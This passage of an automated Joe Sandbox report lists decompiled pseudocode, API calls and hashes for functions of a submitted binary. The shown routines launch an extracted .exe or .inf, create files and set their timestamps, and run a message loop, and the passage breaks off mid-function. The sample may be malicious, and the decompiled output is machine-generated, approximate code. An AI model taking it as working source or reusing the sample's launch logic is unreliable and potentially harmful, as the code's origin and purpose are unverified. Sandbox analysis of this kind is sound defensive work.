SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBCAEF
SendMessageW.USER32(00000000,000000C2,00000000,00BD331C), ref: 00BBCAFE

Strings

\, xrefs: 00BBCA57

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: f8f9e723fa11997975460f4f2bc0f203dc8be1bf5f252b0b2ca60055bb433d44
Instruction ID: 10f97aa1bc7de138f6e8231d19a5720e598af21fb3f91fb0abb0608b08613949
Opcode Fuzzy Hash: f8f9e723fa11997975460f4f2bc0f203dc8be1bf5f252b0b2ca60055bb433d44
Instruction Fuzzy Hash: 3B31EF71144399ABE301DF20DD4AFAFBFACEB42718F050508FA80962E1EBA54904C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00BBCC9F Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00BBCC9F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				intOrPtr _t80;
				signed int _t81;
				signed short* _t82;
				signed short _t83;
				long _t86;
				signed short* _t87;
				void* _t88;
				signed short* _t91;
				struct HWND__* _t93;
				void* _t94;
				void* _t95;
				void* _t98;

				_t94 = __ebp;
				_t54 = 0x1040;
				E00BBE1C0();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00BC33F3(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E00BBF1A0(_t86,  &_a4, 0, _t86);
					_t80 = _a4172;
					_t98 = _t98 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t80 != 0) {
						_a8 = 0x5c0;
					}
					_t81 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_push(_t94);
					_t95 = 0x22;
					if(_t81 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t81 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t80 == 0 &&  *0xbea472 != _t77) {
								_a24 = 0xbea472;
							}
						}
						_a32 = 1;
						_t88 = E00BAB3D3(_t87);
						if(_t88 != 0 && E00BB1708(_t88, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00BAA0C0(_a20) != 0) {
							E00BAB179(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t93 = _a4160;
							if( *0xbe8468 != _t77 || _a4168 != _t77 ||  *0xbfdc91 != _t77) {
								if(_t93 != 0) {
									_push(_t93);
									if( *0xc010a4() != 0) {
										ShowWindow(_t93, _t77);
										_t77 = 1;
									}
								}
								 *0xc010a0(_a56, 0x7d0);
								E00BBD163(_a48);
								if( *0xbfdc91 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0xbfdc94) {
										 *0xbfdc94 = _t68;
									}
									 *0xbfdc92 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t88 == 0 || E00BB1708(_t88, L".exe") != 0) {
								_t54 = _a4160;
								if( *0xbe8468 != 0 && _t54 == 0 &&  *0xbfdc91 == _t54) {
									 *0xbfdc98 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t93, 1);
							}
						}
						goto L55;
					}
					_t82 = _t91;
					_v0 = 0x20;
					do {
						if( *_t82 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t83 = _v0;
									_t91[_t57] = _t83;
									L10:
									if(_t91[_t57] == _t83 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t83 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t82 =  &(_t91[_t57]);
					} while ( *_t82 != _t77);
					goto L13;
				}
			}

0x00bbcc9f
0x00bbcc9f
0x00bbcca4
0x00bbccab
0x00bbccb2
0x00bbccb7
0x00bbcf05
0x00bbcf0d
0x00bbcf0d
0x00bbccbe
0x00bbccc9
0x00000000
0x00bbcccf
0x00bbccd2
0x00bbccda
0x00bbccdf
0x00bbcce6
0x00bbcce9
0x00bbcced
0x00bbccf7
0x00bbccf9
0x00bbccf9
0x00bbcd01
0x00bbcd04
0x00bbcd07
0x00bbcd0a
0x00bbcd0e
0x00bbcd10
0x00bbcd10
0x00bbcd12
0x00bbcd16
0x00bbcd1b
0x00bbcd53
0x00bbcd53
0x00bbcd57
0x00bbcd5a
0x00bbcd63
0x00bbcd6e
0x00bbcd6e
0x00bbcd63
0x00bbcd77
0x00bbcd84
0x00bbcd88
0x00bbcd99
0x00bbcd99
0x00bbcdac
0x00bbcdbc
0x00bbcdc5
0x00bbcdc5
0x00bbcdce
0x00bbcdd6
0x00bbcddc
0x00bbcde9
0x00bbcdfe
0x00bbce00
0x00bbce09
0x00bbce0d
0x00bbce13
0x00bbce13
0x00bbce09
0x00bbce1e
0x00bbce28
0x00bbce34
0x00bbce53
0x00bbce5d
0x00bbce5f
0x00bbce5f
0x00bbce64
0x00bbce64
0x00bbce34
0x00bbce6f
0x00bbce77
0x00bbce8f
0x00bbce96
0x00bbcea4
0x00bbcea4
0x00bbceec
0x00bbceec
0x00bbceec
0x00bbcef5
0x00bbcefe
0x00bbcefe
0x00bbcef5
0x00000000
0x00bbcf04
0x00bbcd1d
0x00bbcd1f
0x00bbcd27
0x00bbcd2a
0x00bbceb6
0x00bbceb6
0x00bbcebb
0x00000000
0x00000000
0x00bbceb4
0x00bbcec2
0x00bbcec6
0x00bbcd34
0x00bbcd38
0x00bbced7
0x00bbcedb
0x00bbcedb
0x00bbcee0
0x00bbcee3
0x00000000
0x00000000
0x00000000
0x00000000
0x00bbcd38
0x00bbceb4
0x00bbcebd
0x00bbcd30
0x00000000
0x00bbcd4a
0x00bbcd4a
0x00bbcd4b
0x00bbcd4e
0x00000000
0x00bbcd27

APIs

ShellExecuteExW.SHELL32(?), ref: 00BBCDCE
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBCE0D
GetExitCodeProcess.KERNEL32 ref: 00BBCE49
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBCE6F
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBCEFE

Part of subcall function 00BB1708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,00BABA45,00000000,.exe,?,?,00000800,?,?,00BB854F,?), ref: 00BB171E

Strings

.exe, xrefs: 00BBCE79
, xrefs: 00BBCD1F
.inf, xrefs: 00BBCD8A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: f4645ba92ab18f6ac257fc0f5026087a30d7ad64adc00a1a781f36f3db5f188e
Instruction ID: 9d57e7eb82b444e6580f31338e27fb56be14167c089cdb57dd510837fefdbd52
Opcode Fuzzy Hash: f4645ba92ab18f6ac257fc0f5026087a30d7ad64adc00a1a781f36f3db5f188e
Instruction Fuzzy Hash: 31617C714087809BD731DF24C844AFBBFE9EB81704F1448AAE9C4971A1EBF1E989D752

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9ED8 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00BC9ED8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xbdd668; // 0xb57946a0
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00BCE52C(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00BBEA8A(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00BCA140(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00BCA5AC(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00BCA140(_t101);
									goto L36;
								}
								_t62 = E00BCA5AC(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00BCA140(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00BC8398(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00BD1870();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00BCA5AC(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00BC8398(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00BD1870();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x00bc9edd
0x00bc9ede
0x00bc9edf
0x00bc9ee6
0x00bc9eea
0x00bc9eeb
0x00bc9ef1
0x00bc9ef7
0x00bc9efd
0x00bc9f00
0x00bc9f00
0x00bc9f03
0x00bc9f05
0x00bc9f05
0x00bc9f03
0x00bc9f07
0x00bc9f0c
0x00bc9f13
0x00bc9f16
0x00bc9f16
0x00bc9f32
0x00bc9f38
0x00bc9f3d
0x00bca0d0
0x00bca0e3
0x00bc9f43
0x00bc9f43
0x00bc9f46
0x00bc9f4b
0x00bc9f4f
0x00bc9fa3
0x00bc9fa3
0x00bc9fa5
0x00bc9fa7
0x00bca0c5
0x00bca0c5
0x00bca0c7
0x00bca0c8
0x00000000
0x00bca0ce
0x00bc9fb8
0x00bc9fbe
0x00bc9fc0
0x00000000
0x00000000
0x00bc9fc6
0x00bc9fd8
0x00bc9fdd
0x00bc9fe1
0x00000000
0x00000000
0x00bc9fee
0x00bca028
0x00bca02b
0x00bca02e
0x00bca030
0x00bca032
0x00bca034
0x00bca080
0x00bca080
0x00bca082
0x00bca082
0x00bca084
0x00bca0be
0x00bca0bf
0x00000000
0x00bca0c4
0x00bca098
0x00bca09d
0x00bca09f
0x00000000
0x00000000
0x00bca0a3
0x00bca0a4
0x00bca0a5
0x00bca0a8
0x00bca0e4
0x00bca0e7
0x00bca0aa
0x00bca0aa
0x00bca0ab
0x00bca0ab
0x00bca0b8
0x00bca0ba
0x00bca0bc
0x00bca0ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00bca0bc
0x00bca036
0x00bca039
0x00bca03b
0x00bca03d
0x00bca03f
0x00bca042
0x00bca047
0x00bca062
0x00bca064
0x00bca06e
0x00bca070
0x00bca071
0x00bca073
0x00000000
0x00000000
0x00bca075
0x00bca07b
0x00bca07b
0x00000000
0x00bca07b
0x00bca049
0x00bca04b
0x00bca04f
0x00bca054
0x00bca056
0x00bca058
0x00000000
0x00000000
0x00bca05a
0x00000000
0x00bca05a
0x00bc9ff0
0x00bc9ff5
0x00000000
0x00000000
0x00bc9ffb
0x00bc9ffd
0x00000000
0x00000000
0x00bca014
0x00bca019
0x00bca01d
0x00000000
0x00000000
0x00000000
0x00bca023
0x00bc9f56
0x00bc9f58
0x00bc9f5a
0x00bc9f62
0x00bc9f81
0x00bc9f83
0x00bc9f8d
0x00bc9f8f
0x00bc9f90
0x00bc9f92
0x00000000
0x00000000
0x00bc9f98
0x00bc9f9e
0x00bc9f9e
0x00000000
0x00bc9f9e
0x00bc9f66
0x00bc9f6a
0x00bc9f6f
0x00bc9f73
0x00000000
0x00000000
0x00bc9f79
0x00000000
0x00bc9f79

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC4DDB,00BC4DDB,?,?,?,00BCA129,00000001,00000001,7FE85006), ref: 00BC9F32
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BCA129,00000001,00000001,7FE85006,?,?,?), ref: 00BC9FB8
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,7FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BCA0B2
__freea.LIBCMT ref: 00BCA0BF

Part of subcall function 00BC8398: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC3866,?,0000015D,?,?,?,?,00BC4D42,000000FF,00000000,?,?), ref: 00BC83CA

__freea.LIBCMT ref: 00BCA0C8
__freea.LIBCMT ref: 00BCA0ED

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4919e549ad9b8e2f7837a7752671f0bbdefb1fdcd4463da93d65415ada56feb6
Instruction ID: 5dc5c9bc6d99b02ffc839d3fd090d41ce172f59250f2543caf1b250a61fd3323
Opcode Fuzzy Hash: 4919e549ad9b8e2f7837a7752671f0bbdefb1fdcd4463da93d65415ada56feb6
Instruction Fuzzy Hash: 7851A07260021AAFEB258F64CC45FAF7BE9EB44798F1546ADF904D7140EB35EC4086A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9950 Relevance: 7.6, APIs: 5, Instructions: 116
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00BA9950(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E00BBE1C0();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00BA7098( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E00BAFD96(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E00BAB5AC(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x00ba9950
0x00ba9955
0x00ba995b
0x00ba9964
0x00ba9966
0x00ba9971
0x00ba997c
0x00ba9978
0x00ba9978
0x00ba9978
0x00ba9982
0x00ba998a
0x00ba9992
0x00ba999b
0x00ba999d
0x00ba999d
0x00ba99a8
0x00ba99ad
0x00ba99af
0x00ba99af
0x00ba99c4
0x00ba99c8
0x00ba99d1
0x00ba99d3
0x00ba99d3
0x00ba99ec
0x00ba99f2
0x00ba99f7
0x00ba9a5b
0x00ba9a60
0x00ba9a67
0x00ba9a70
0x00ba9a7b
0x00ba9a7b
0x00ba9a86
0x00ba9a89
0x00ba9a8c
0x00ba9a8f
0x00ba9a95
0x00ba9aa6
0x00ba9aaa
0x00ba9aaa
0x00ba9aba
0x00ba99f9
0x00ba99ff
0x00ba9a1b
0x00ba9a4a
0x00ba9a4f
0x00ba9a51
0x00ba9a51
0x00000000
0x00ba9a4f
0x00ba9a34
0x00ba9a36
0x00ba9a3f
0x00ba9a41
0x00ba9a41
0x00ba9a48
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba9a48

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00BA7886,?,00000005,?,00000011), ref: 00BA99EC
GetLastError.KERNEL32(?,?,00BA7886,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA99F9
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00BA7886,?,00000005,?), ref: 00BA9A2E
GetLastError.KERNEL32(?,?,00BA7886,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA9A36
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BA7886,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA9A7B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 7edeab3b3a5416ade2ab1c8d70352c0c8d0dabb9cdcc23857377db7ce69a4e68
Instruction ID: bbd865b00e24fd485fb09a36022e259e0116fff58c760a59c535d8a24959607b
Opcode Fuzzy Hash: 7edeab3b3a5416ade2ab1c8d70352c0c8d0dabb9cdcc23857377db7ce69a4e68
Instruction Fuzzy Hash: 9D4147319487466FE7209F24CC45BDBBBE4FB02324F10475AF5E1961D0EBB59888DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BBABC4 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00BBABC4() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0);
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xbe7438; // 0x60384
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						return DispatchMessageW( &_v32);
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x00bbabd5
0x00bbabdd
0x00bbabe6
0x00bbabec
0x00bbabf3
0x00bbac04
0x00bbac08
0x00000000
0x00bbac12
0x00bbabfa
0x00bbac02
0x00000000
0x00000000
0x00bbac02
0x00bbac1c

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBABD5
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBABE6
IsDialogMessageW.USER32(00060384,?), ref: 00BBABFA
TranslateMessage.USER32(?), ref: 00BBAC08
DispatchMessageW.USER32(?), ref: 00BBAC12

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 50d0a42db67e7fc7f282c7edd6e85f9c05e66f365995e261f594a06656fa065d
Instruction ID: c6f5663b896888f2362c4210cce4bf0af934fd9042936bb3a59046bcb010b718
Opcode Fuzzy Hash: 50d0a42db67e7fc7f282c7edd6e85f9c05e66f365995e261f594a06656fa065d
Instruction Fuzzy Hash: 04F01771E01269ABCF20ABE2AC4CFEFBFACEE053957448055B909D2110EA78D445CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA245 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00BBA245(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00BB1708( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
